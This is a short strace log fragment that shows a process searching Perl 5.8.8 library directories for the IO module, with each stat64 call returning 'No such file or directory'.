8161  07:22:08.868823 stat64("/etc/perl/IO.pmc", 0xbf9fc74c) = -1 ENOENT (No such file or directory)

8161  07:22:08.868873 stat64("/etc/perl/IO.pm", 0xbf9fc65c) = -1 ENOENT (No such file or directory)

8161  07:22:08.868886 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbf9fc74c) = -1 ENOENT (No such file or directory)

8161  07:22:08.868899 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbf9fc65c) = -1 ENOENT (No such file or directory)

8161  07:22:08.868912 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbf9fc74c) = -1 ENOENT (No such file or directory)

8161  07:22:08.868925 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbf9fc65c) = -1 ENOENT (No such file or directory)

8161  07:22:08.868938 stat64("/usr/lib/perl5/IO.pmc", 0xbf9fc74c) = -1 ENOENT (No such file or directory)

8161  07:22:08.868950 stat64("/usr/lib/perl5/IO.pm", 0xbf9fc65c) = -1 ENOENT (No such file or directory)

8161  07:22:08.868963 stat64("/usr/share/perl5/IO.pmc", 0xbf9fc74c) = -1 ENOENT (No such file or directory)

